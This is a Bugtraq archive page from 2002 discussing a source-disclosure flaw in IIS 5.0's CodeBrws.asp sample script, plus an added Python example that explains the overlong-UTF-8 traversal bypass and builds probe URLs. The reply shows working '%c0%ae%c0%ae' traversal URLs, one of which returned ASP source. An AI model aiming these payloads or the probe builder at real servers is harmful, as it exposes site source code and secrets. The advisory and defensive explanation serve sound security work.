Bugtraq mailing list archives
RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
From: "Randy Hinders" <rahinders () hotmail com>
Date: Wed, 17 Apr 2002 08:25:27 -0400
While checking various files and extensions I wanted to ensure that other files were still "protected" from this. I was not able to read the global.asa but was able to read (as expected) other asp pages.
http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa
Returned "View Active Server Page Source-- Access Denied" to the browser.

http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp
Returned the source code to the browser.

Yes, the IISSAMPLES and all other SDK items should never be installed on a production machine, but should a client upload this code to a shared hosting environment where the global.asa is properly protected with NTFS permissions, they will not be able to gain access to the source code through this method.
HTH
Randy Hinders
MCT (ret.), MCSE, MCP +I & A+
NT Systems Administrator
DONet, Inc
www.donet.com
www.adsi4nt.com
~~Hoka Hey, Lakotas~~

-----Original Message-----
From: H D Moore [mailto:sflist () digitaloffense net]
Sent: Tuesday, April 16, 2002 11:01 PM
To: bugtraq () securityfocus com
Cc: vulnwatch () vulnwatch org
Subject: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

--[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

Summary:

Microsoft's IIS 5.0 web server is shipped with a set of sample files to demonstrate different features of the ASP language. One of these sample files allows a remote user to view the source of any file in the web root with the extension .asp, .inc, .htm, or .html. The IISSamples virtual directory should not be left on production servers in the first place, but until now there were no serious[1] vulnerabilities found in those sample scripts. Microsoft was _not_ contacted about this, they can read the lists like everyone else. This is an issue that can be fixed by proper system administration.

<snip>
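The following is an added example, not code from either post in this thread. It reproduces offline the pieces behind the two probes above: it builds the CodeBrws.asp URL in the form used in the thread, shows why "%c0%ae%c0%ae" (an overlong two-byte UTF-8 encoding of ".") gets past a filter that only looks for a literal ".." in the raw parameter while a conforming UTF-8 decoder rejects the bytes outright, applies the extension list from H D Moore's summary, and classifies a response body using the "Access Denied" string quoted above. The two sample response bodies and the heuristic for recognising returned source (HTML-escaped ASP delimiters) are assumptions for illustration, not captured from a real server.

```python
# Added example (not from the Bugtraq posts): offline reproduction of the checks
# behind the two CodeBrws.asp probes in the thread. Sample bodies and the
# source-detection heuristic are constructed assumptions.
from urllib.parse import unquote_to_bytes

CODEBRWS = "/iissamples/sdk/asp/docs/CodeBrws.asp"
OVERLONG_DOT = "%c0%ae"           # overlong 2-byte UTF-8 form of '.' (0x2E)
ALLOWED_EXT = (".asp", ".inc", ".htm", ".html")   # per H D Moore's summary
DENIED_MARKER = "Access Denied"   # from "View Active Server Page Source-- Access Denied"

# Constructed sample responses (not captured from a real server).
SAMPLE_DENIED = "<html><body>View Active Server Page Source-- Access Denied</body></html>"
SAMPLE_SOURCE = (
    "<html><body><pre>&lt;%@ Language=VBScript %&gt;\n"
    "&lt;% Response.Write \"Welcome\" %&gt;</pre></body></html>"
)


def naive_dotdot_check(source_param: str) -> bool:
    """Pre-decoding filter that only rejects a literal '..'.
    Returns True when the raw parameter looks safe to such a filter."""
    return ".." not in source_param


def lenient_utf8(raw: bytes) -> str:
    """Decode UTF-8 like an over-permissive decoder: accept overlong two-byte
    sequences with C0/C1 lead bytes instead of rejecting them. Only ASCII and
    two-byte forms are handled, which is enough for these URLs."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("unsupported byte sequence at offset %d" % i)
    return "".join(out)


def decode_leniently(source_param: str) -> str:
    """Percent-decode, then decode the bytes leniently: the path a file
    lookup ends up seeing if overlong forms are accepted."""
    return lenient_utf8(unquote_to_bytes(source_param))


def strict_utf8_rejects(source_param: str) -> bool:
    """True if a standards-conforming UTF-8 decoder refuses the same bytes."""
    try:
        unquote_to_bytes(source_param).decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


def extension_allowed(path: str) -> bool:
    """Extension allow-list from the original advisory."""
    return path.lower().endswith(ALLOWED_EXT)


def build_probe(target: str) -> str:
    """Source= value in the form used in the thread: the IISSAMPLES prefix,
    one overlong '..', then the target path relative to the web root."""
    return "%s?Source=/IISSAMPLES/%s%s/%s" % (
        CODEBRWS, OVERLONG_DOT, OVERLONG_DOT, target.lstrip("/"))


def classify(body: str) -> str:
    """'denied' on the marker quoted in the thread; 'source-disclosed' if
    HTML-escaped ASP delimiters are present (assumed heuristic); else 'unknown'."""
    if DENIED_MARKER in body:
        return "denied"
    if "&lt;%" in body and "%&gt;" in body:
        return "source-disclosed"
    return "unknown"


if __name__ == "__main__":
    for target in ("global.asa", "iisstart.asp"):
        probe = build_probe(target)
        param = probe.split("?Source=", 1)[1]
        print(probe)
        print("  naive '..' check passes:", naive_dotdot_check(param))
        print("  lenient decode         :", decode_leniently(param))
        print("  strict UTF-8 rejects   :", strict_utf8_rejects(param))
        print("  extension allowed      :", extension_allowed(target))
    print(classify(SAMPLE_DENIED), classify(SAMPLE_SOURCE))
```

The point the decoder pair makes is the one that matters for any pre-decoding filter, not just this sample script: a check for ".." on the raw query string passes the overlong form, a lenient decoder then turns "%c0%ae%c0%ae" into "..", and only a strict decoder that refuses C0/C1 lead bytes closes the gap. Run it against a live host only where you have permission; as written it touches nothing on the network.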
Current thread:
- Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Joe Testa (Apr 17)
- <Possible follow-ups>
- RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Randy Hinders (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Chris Anley (Apr 18)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)